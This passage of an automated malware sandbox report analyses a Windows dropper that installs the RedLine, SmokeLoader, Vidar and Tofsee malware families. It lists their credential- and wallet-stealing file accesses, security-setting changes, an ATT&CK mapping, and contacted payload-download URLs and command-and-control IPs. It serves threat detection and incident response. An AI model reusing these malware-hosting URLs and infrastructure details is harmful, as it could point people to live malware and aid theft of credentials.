                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_0042C9E0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_0041CAD7 GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00406C10 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary,

                        Lowering of HIPS / PFW / Operating System Security Settings:

                        barindex
                        Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                        Source: svchost.exe, 00000009.00000002.553367489.00000199C1C3D000.00000004.00000001.sdmpBinary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
                        Source: svchost.exe, 00000009.00000002.554421326.00000199C1D02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 27.2.A3D.exe.3bdfda0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.A3D.exe.3bdfda0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000027.00000000.470989961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.469887932.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.482088849.0000000003AC1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.470430642.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.469381814.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BC9C.exe, type: DROPPED
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 00000006.00000002.347406740.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.406588143.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.347689698.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.406852686.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000000.337265562.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                        Yara detected Vidar stealerShow sources
                        Source: Yara matchFile source: 00000019.00000002.453551243.0000000000653000.00000004.00000001.sdmp, type: MEMORY
                        Yara detected TofseeShow sources
                        Source: Yara matchFile source: 26.2.F3F5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.F3F5.exe.bc0e50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.F3F5.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.F3F5.exe.be0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001A.00000002.484836901.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.442910237.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.486122776.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: F3F5.exe PID: 3132, type: MEMORYSTR
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Tries to steal Crypto Currency WalletsShow sources
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: Yara matchFile source: 00000019.00000002.453551243.0000000000653000.00000004.00000001.sdmp, type: MEMORY

                        Remote Access Functionality:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 27.2.A3D.exe.3bdfda0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.A3D.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.A3D.exe.3bdfda0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000027.00000000.470989961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.469887932.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.482088849.0000000003AC1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.470430642.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.469381814.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BC9C.exe, type: DROPPED
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 00000006.00000002.347406740.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.406588143.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.347689698.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.406852686.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000000.337265562.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                        Yara detected Vidar stealerShow sources
                        Source: Yara matchFile source: 00000019.00000002.453551243.0000000000653000.00000004.00000001.sdmp, type: MEMORY
                        Yara detected TofseeShow sources
                        Source: Yara matchFile source: 26.2.F3F5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.F3F5.exe.bc0e50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.F3F5.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.F3F5.exe.be0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001A.00000002.484836901.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.442910237.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.486122776.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: F3F5.exe PID: 3132, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools111OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsNative API11Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsExploitation for Client Execution1Valid Accounts1Valid Accounts1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsService Execution3Windows Service4Access Token Manipulation1Software Packing44NTDSSystem Information Discovery47Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptWindows Service4Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol225Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonProcess Injection413DLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery461VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading31Proc FilesystemVirtualization/Sandbox Evasion141Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion141Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                        Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection413KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                        Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 545822 Sample: 4BfFNMA5mb.exe Startdate: 28/12/2021 Architecture: WINDOWS Score: 100 91 s3-w.us-east-1.amazonaws.com 2->91 93 s3-1-w.amazonaws.com 2->93 95 6 other IPs or domains 2->95 117 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->117 119 Multi AV Scanner detection for domain / URL 2->119 121 Found malware configuration 2->121 123 17 other signatures 2->123 11 4BfFNMA5mb.exe 2->11         started        13 svchost.exe 2->13         started        16 jutawrs 2->16         started        18 10 other processes 2->18 signatures3 process4 dnsIp5 21 4BfFNMA5mb.exe 11->21         started        145 Changes security center settings (notifications, updates, antivirus, firewall) 13->145 24 MpCmdRun.exe 1 13->24         started        147 Machine Learning detection for dropped file 16->147 26 jutawrs 16->26         started        97 192.168.2.1 unknown unknown 18->97 signatures6 process7 signatures8 125 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->125 127 Maps a DLL or memory area into another process 21->127 129 Checks if the current machine is a virtual machine (disk enumeration) 21->129 131 Creates a thread in another existing process (thread injection) 21->131 28 explorer.exe 10 21->28 injected 33 conhost.exe 24->33         started        process9 dnsIp10 103 185.233.81.115, 443, 49768 SUPERSERVERSDATACENTERRU Russian Federation 28->103 105 downloafilesaccess.ddns.net 155.248.231.246, 443, 49874 SUN-JAVAUS United States 28->105 107 16 other IPs or domains 28->107 83 C:\Users\user\AppData\Roaming\jutawrs, PE32 28->83 dropped 85 C:\Users\user\AppData\Local\Temp\F3F5.exe, PE32 28->85 dropped 87 C:\Users\user\AppData\Local\Temp936.exe, PE32 28->87 dropped 89 10 other files (9 malicious) 28->89 dropped 149 System process connects to network (likely due to code injection or exploit) 28->149 151 Benign windows process drops PE files 28->151 153 Deletes itself after installation 28->153 155 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->155 35 E936.exe 127 28->35         started        40 2AA1.exe 28->40         started        42 A3D.exe 28->42         started        44 F3F5.exe 2 28->44         started        file11 signatures12 process13 dnsIp14 99 file-file-host4.com 35->99 75 C:\Users\user\AppData\...\sqlite3[1].dll, PE32 35->75 dropped 77 C:\ProgramData\sqlite3.dll, PE32 35->77 dropped 133 Detected unpacking (changes PE section rights) 35->133 135 Detected unpacking (overwrites its own PE header) 35->135 137 Machine Learning detection for dropped file 35->137 143 3 other signatures 35->143 46 cmd.exe 35->46         started        139 Multi AV Scanner detection for dropped file 40->139 48 2AA1.exe 40->48         started        141 Injects a PE file into a foreign processes 42->141 51 A3D.exe 42->51         started        79 C:\Users\user\AppData\Local\...\almerphs.exe, PE32 44->79 dropped 54 cmd.exe 44->54         started        57 cmd.exe 44->57         started        59 sc.exe 44->59         started        61 sc.exe 44->61         started        file15 signatures16 process17 dnsIp18 63 conhost.exe 46->63         started        65 timeout.exe 46->65         started        109 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 48->109 111 Maps a DLL or memory area into another process 48->111 113 Checks if the current machine is a virtual machine (disk enumeration) 48->113 115 Creates a thread in another existing process (thread injection) 48->115 101 86.107.197.138, 38133, 49851 MOD-EUNL Romania 51->101 81 C:\Windows\SysWOW64\...\almerphs.exe (copy), PE32 54->81 dropped 67 conhost.exe 54->67         started        69 conhost.exe 57->69         started        71 conhost.exe 59->71         started        73 conhost.exe 61->73         started        file19 signatures20 process21

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        4BfFNMA5mb.exe36%VirustotalBrowse
                        4BfFNMA5mb.exe53%ReversingLabsWin32.Trojan.Raccrypt
                        4BfFNMA5mb.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\B24B.exe100%AviraTR/Crypt.ASPM.Gen
                        C:\Users\user\AppData\Local\Temp\E936.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\8992.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\9904.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\jutawrs100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\2AA1.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\6BE6.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\A3D.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\almerphs.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\B24B.exe100%Joe Sandbox ML
                        C:\ProgramData\sqlite3.dll3%MetadefenderBrowse
                        C:\ProgramData\sqlite3.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\2AA1.exe40%ReversingLabsWin32.Trojan.Chapak
                        C:\Users\user\AppData\Local\Temp\6BE6.exe44%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Temp\7D3D.exe28%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\9904.exe40%ReversingLabsWin32.Infostealer.Generic
                        C:\Users\user\AppData\Local\Temp\A3D.exe60%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        6.1.4BfFNMA5mb.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        25.3.E936.exe.5e0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                        6.0.4BfFNMA5mb.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        20.0.jutawrs.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        25.2.E936.exe.5c0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                        6.0.4BfFNMA5mb.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        20.0.jutawrs.400000.3.unpack100%AviraHEUR/AGEN.1121539Download File
                        19.0.2AA1.exe.400000.3.unpack100%AviraHEUR/AGEN.1126869Download File
                        20.0.jutawrs.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        26.2.F3F5.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                        19.0.2AA1.exe.400000.0.unpack100%AviraHEUR/AGEN.1126869Download File
                        1.2.4BfFNMA5mb.exe.4e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        25.2.E936.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        6.0.4BfFNMA5mb.exe.400000.2.unpack100%AviraHEUR/AGEN.1121539Download File
                        26.2.F3F5.exe.bc0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                        19.0.2AA1.exe.400000.2.unpack100%AviraHEUR/AGEN.1126869Download File
                        20.0.jutawrs.400000.1.unpack100%AviraHEUR/AGEN.1121539Download File
                        6.0.4BfFNMA5mb.exe.400000.3.unpack100%AviraHEUR/AGEN.1121539Download File
                        20.1.jutawrs.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        6.0.4BfFNMA5mb.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        20.2.jutawrs.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        19.0.2AA1.exe.400000.1.unpack100%AviraHEUR/AGEN.1126869Download File
                        6.0.4BfFNMA5mb.exe.400000.1.unpack100%AviraHEUR/AGEN.1121539Download File
                        19.0.2AA1.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        14.2.jutawrs.5015a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        20.0.jutawrs.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        26.3.F3F5.exe.be0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                        15.2.2AA1.exe.4e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        6.0.4BfFNMA5mb.exe.400000.0.unpack100%AviraHEUR/AGEN.1121539Download File
                        19.2.2AA1.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        6.2.4BfFNMA5mb.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        20.0.jutawrs.400000.0.unpack100%AviraHEUR/AGEN.1121539Download File
                        19.1.2AA1.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        19.0.2AA1.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        20.0.jutawrs.400000.2.unpack100%AviraHEUR/AGEN.1121539Download File
                        19.0.2AA1.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                        Domains

                        SourceDetectionScannerLabelLink
                        kent0mushinec0n3t.casacam.net2%VirustotalBrowse
                        file-file-host4.com15%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://privacytools-foryou-777.com/downloads/toolspab2.exe0%Avira URL Cloudsafe
                        http://185.7.214.171:8080/6.php100%URL Reputationmalware
                        http://host-data-coin-11.com/0%URL Reputationsafe
                        https://downloafilesaccess.ddns.net/x009B.exe0%Avira URL Cloudsafe
                        http://data-host-coin-8.com/game.exe0%Avira URL Cloudsafe
                        http://file-file-host4.com/tratata.php0%URL Reputationsafe
                        http://91.243.44.128/stlr/maps.exe100%Avira URL Cloudmalware
                        http://data-host-coin-8.com/files/2264_1640622147_2258.exe0%Avira URL Cloudsafe
                        pa:4430%Avira URL Cloudsafe
                        https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                        https://api.ip.sb/ip0%URL Reputationsafe
                        http://unicupload.top/install5.exe100%URL Reputationphishing
                        http://file-coin-host-12.com/0%URL Reputationsafe
                        http://crl.ver)0%Avira URL Cloudsafe
                        http://file-file-host4.com/sqlite3.dll0%URL Reputationsafe
                        https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                        parubey.info:4430%Avira URL Cloudsafe
                        https://%s.xboxlive.com0%URL Reputationsafe
                        https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                        http://data-host-coin-8.com/files/5376_1640094939_1074.exe0%Avira URL Cloudsafe
                        https://dynamic.t0%URL Reputationsafe
                        https://disneyplus.com/legal.0%URL Reputationsafe
                        http://help.disneyplus.com.0%URL Reputationsafe
                        https://%s.dnet.xboxlive.com0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bitbucket.org
                        104.192.141.1
                        truefalse
                          high
                          kent0mushinec0n3t.casacam.net
                          178.238.8.177
                          truefalseunknown
                          patmushta.info
                          47.251.38.135
                          truefalse
                            unknown
                            cdn.discordapp.com
                            162.159.135.233
                            truefalse
                              high
                              downloafilesaccess.ddns.net
                              155.248.231.246
                              truetrue
                                unknown
                                file-file-host4.com
                                5.188.89.48
                                truetrueunknown
                                f0613918.xsph.ru
                                141.8.192.151
                                truefalse
                                  high
                                  s3-w.us-east-1.amazonaws.com
                                  52.216.132.51
                                  truefalse
                                    high
                                    unicupload.top
                                    54.38.220.85
                                    truetrue
                                      unknown
                                      elew3le3lanle.freeddns.org
                                      178.238.8.177
                                      truefalse
                                        unknown
                                        host-data-coin-11.com
                                        5.188.89.48
                                        truetrue
                                          unknown
                                          transfer.sh
                                          144.76.136.153
                                          truefalse
                                            high
                                            privacytools-foryou-777.com
                                            5.188.89.48
                                            truetrue
                                              unknown
                                              data-host-coin-8.com
                                              5.188.89.48
                                              truetrue
                                                unknown
                                                bbuseruploads.s3.amazonaws.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  infinity-cheats.com
                                                  unknown
                                                  unknowntrue
                                                    unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://cdn.discordapp.com/attachments/925145879403446292/925145901322879006/top.exefalse
                                                      high
                                                      http://privacytools-foryou-777.com/downloads/toolspab2.exefalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://185.7.214.171:8080/6.phptrue
                                                      • URL Reputation: malware
                                                      unknown
                                                      https://bitbucket.org/georgindesign/desingner/downloads/Update.exefalse
                                                        high
                                                        http://host-data-coin-11.com/true
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://downloafilesaccess.ddns.net/x009B.exefalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://data-host-coin-8.com/game.exefalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bitbucket.org/georgindesign/desingner/downloads/Updater.exefalse
                                                          high
                                                          https://transfer.sh/get/s3SPeb/A.exefalse
                                                            high
                                                            http://file-file-host4.com/tratata.phptrue
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://91.243.44.128/stlr/maps.exetrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://data-host-coin-8.com/files/2264_1640622147_2258.exefalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            pa:443true
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://unicupload.top/install5.exetrue
                                                            • URL Reputation: phishing
                                                            unknown
                                                            http://file-coin-host-12.com/true
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://file-file-host4.com/sqlite3.dlltrue
                                                            • URL Reputation: safe
                                                            unknown
                                                            parubey.info:443true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://bitbucket.org/trustedrootdev/file/downloads/SystemInjectSvHostAllocation.jpegfalse
                                                              high
                                                              https://bitbucket.org/erkermacher/eclipse/downloads/Original.exefalse
                                                                high
                                                                http://data-host-coin-8.com/files/5376_1640094939_1074.exefalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdn.discordapp.com/attachments/812323288264605709/924475642190397461/Hairstyle.exefalse
                                                                  high
                                                                  https://bitbucket.org/evangelioshas/2/downloads/1.exefalse
                                                                    high

                                                                    URLs from Memory and Binaries

                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://duckduckgo.com/chrome_newtabEKNYUKXB.25.drfalse
